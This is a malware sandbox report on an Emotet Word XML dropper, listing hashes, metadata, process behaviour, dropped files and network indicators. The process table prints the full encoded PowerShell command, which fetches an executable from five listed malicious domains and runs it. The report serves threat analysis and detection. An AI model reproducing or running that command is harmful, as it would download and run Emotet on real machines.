analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

054fbb9beaeeaa2b3a8c09f983072efc.doc

Full analysis: https://app.any.run/tasks/a7f3f5f4-36ba-4130-9317-a17637debff8
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 19, 2019, 12:52:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

8FD54604327C3B528C4AEA510B78726B

SHA1:

F3C94BBECB23F7C27EFC9D518494ABA0D4F96C82

SHA256:

851EB205F74663A82E8D6A1ABD8484C3011190F499121422AB0D83BAF0D6AAB9

SSDEEP:

3072:WoUupEHY0iB4sVej0KpghkfVdJvLuL76jJG+6RWajL/xSu90OoiLuDKZXfwKelj8:Qu0iojTgmj5LW76dl6RWIxUOmD+XfwLA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2628)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2628)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2964)
    • Creates files in the user directory

      • Powershell.exe (PID: 4080)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2628)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2628)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:02:08 21:27:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:02:08 21:27:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 1
WordDocumentDocumentPropertiesCharacters: 12
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 12
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: zriZRma
WordDocumentDocSuppDataBinData: (Binary data 115748 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00340AD4
WordDocumentBodySectPRsidR: 00340AD4
WordDocumentBodySectPRsidRDefault: 00340AD4
WordDocumentBodySectPRRsidRPr: 00E73302
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://FnjuawG7BfBiB6
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://FnjuawG7BfBiB6
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msoxmled.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\054fbb9beaeeaa2b3a8c09f983072efc.doc.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2628"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\054fbb9beaeeaa2b3a8c09f983072efc.doc.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4080Powershell -e JAB6AEUAdwBRAG4AQwBJAFIAPQAoACcAUAAnACsAJwBYADgANQAnACsAJwBVAFEAJwApADsAJAByAGoANwBkAFIAegBDAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEASABPADgAbgBqAD0AKAAnAGgAdAB0AHAAOgAvACcAKwAnAC8AbABpAHYAaQBuAGcAcwBvAGwAJwArACcAaQB0ACcAKwAnAHUAJwArACcAZABlAC4AYwBvAG0ALwAnACsAJwBIAFEAZgAnACsAJwBoAE4AUAA1AEkAQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvACcAKwAnAGoAYQAnACsAJwBzACcAKwAnAHAAaQBuAGYAbwAnACsAJwByAG0AJwArACcAYQB0AGkAYwBhAC4AYwBvAG0ALwAnACsAJwBnAFYAUABzACcAKwAnAFYAMABQACcAKwAnAFMAUgBTAEAAaAB0AHQAcAA6AC8AJwArACcALwAnACsAJwBpAGQAaQBnAGkAdABvACcAKwAnAC4AbgBlAHQALwAyACcAKwAnAEYAbwA3ADIAJwArACcAVABpACcAKwAnAFoASgBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AYgAnACsAJwBlAHoAJwArACcAbwBlAGsAYgBvAHMAJwArACcAbgBpACcAKwAnAGUALgBuAGwALwBMAFYAeQBRAGUAWAB0AFcAdQBAAGgAdAB0AHAAJwArACcAOgAvAC8AdwB3AHcALgBlAGwAcgBhAGMAbwBzAGUAYwByAGUAdAAuAGMAbwBtAC8AcgAnACsAJwBiADMAeABSAGQAYwAnACsAJwBoACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEgAZgBUAHMAMgBBAD0AKAAnAGoAJwArACcATAA0ADQARQAnACsAJwBrAFQARgAnACkAOwAkAFgAegBDAFYAQwBiADcAIAA9ACAAKAAnADUAJwArACcAOAA0ACcAKQA7ACQAagA4AEYAMwBqAFoAOABUAD0AKAAnAHUAcgAnACsAJwBFADcAUQB6AFgAJwApADsAJABhADcAawBIAEEAdwBmAEYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFgAegBDAFYAQwBiADcAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABMAE8ANgBmAGgATQA5ACAAaQBuACAAJABhAEgATwA4AG4AagApAHsAdAByAHkAewAkAHIAagA3AGQAUgB6AEMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQATABPADYAZgBoAE0AOQAsACAAJABhADcAawBIAEEAdwBmAEYAKQA7ACQASwB3AFIANQBaADcAPQAoACcAQwBzAEUAMgAnACsAJwBVACcAKwAnAGMAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAYQA3AGsASABBAHcAZgBGADsAJABMAEQAbgB3AFQANQBxAD0AKAAnAG0AJwArACcAaQB3ADgAegB6ACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABRAHAAMwBZAEQAcAA2AD0AKAAnAHYAJwArACcAbABJACcAKwAnAG4AaQBPACcAKQA7AA== C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 787
Read events
1 322
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2628WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE5A1.tmp.cvr
MD5:
SHA256:
2628WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49F7AC99.tmp
MD5:
SHA256:
4080Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EY5R7E380539VMNMOUFB.temp
MD5:
SHA256:
4080Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2628WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:51841B3D88B50BFD73A91594DDA18C62
SHA256:F7F45BAFD351A1E8BB642D6A8C100AC81042F4B7BB57C5D9F08083C2A55AFE9E
4080Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20eee8.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2628WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$4fbb9beaeeaa2b3a8c09f983072efc.doc.xmlpgc
MD5:8B62FB6B78E7776D25F7964EC93F30FE
SHA256:961354ABB96F0A319DE610B8A38C066A65BBFAF94BDE28789744AF40477BD8E4
2628WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:1A84DED5FFE6E666EC227646454A3579
SHA256:B5D6A76F37795EB85E1747EDBB99A4B7604745B7FB484B9EE100C133AB05C90D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4080
Powershell.exe
GET
404
162.244.94.162:80
http://idigito.net/2Fo72TiZJ
US
html
1.12 Kb
unknown
4080
Powershell.exe
GET
404
167.99.71.233:80
http://livingsolitude.com/HQfhNP5I
US
html
290 b
suspicious
4080
Powershell.exe
GET
404
86.109.170.198:80
http://jaspinformatica.com/gVPsV0PSRS
ES
html
965 b
malicious
4080
Powershell.exe
GET
404
185.182.57.120:80
http://bezoekbosnie.nl/LVyQeXtWu
NL
html
480 b
suspicious
4080
Powershell.exe
GET
404
209.240.96.46:80
http://www.elracosecret.com/rb3xRdch
US
html
14.4 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4080
Powershell.exe
86.109.170.198:80
jaspinformatica.com
Abansys & Hostytec, S.L.
ES
malicious
4080
Powershell.exe
167.99.71.233:80
livingsolitude.com
US
unknown
4080
Powershell.exe
162.244.94.162:80
idigito.net
FranTech Solutions
US
unknown
4080
Powershell.exe
185.182.57.120:80
bezoekbosnie.nl
Astralus B.V.
NL
suspicious
4080
Powershell.exe
209.240.96.46:80
www.elracosecret.com
Turnkey Internet Inc.
US
malicious

DNS requests

Domain
IP
Reputation
livingsolitude.com
  • 167.99.71.233
suspicious
jaspinformatica.com
  • 86.109.170.198
unknown
idigito.net
  • 162.244.94.162
unknown
bezoekbosnie.nl
  • 185.182.57.120
suspicious
www.elracosecret.com
  • 209.240.96.46
unknown

Threats

No threats detected
No debug info